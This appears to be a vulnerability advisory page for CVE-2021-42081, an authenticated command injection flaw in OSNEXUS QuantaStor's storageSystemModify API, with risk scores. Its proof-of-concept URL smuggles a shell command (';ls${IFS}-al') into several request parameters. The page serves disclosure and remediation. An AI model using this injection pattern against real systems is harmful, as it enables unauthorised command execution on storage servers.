CVE-2021-42081 | Authenticated Remote Command Execution vulnerability in OSNEXUS QuantaStor before 6.0.0.355
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC
http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
Conclusion & alert: CVE-2021-42081 is rated Moderate Risk (57.5/100): CVSS Critical severity, with medium exploitation likelihood (EPSS 0.99%).Mandatory action: Review affected assets and schedule remediation.
Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.
Exploit prediction scoring system (EPSS) score for CVE-2021-42081
EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).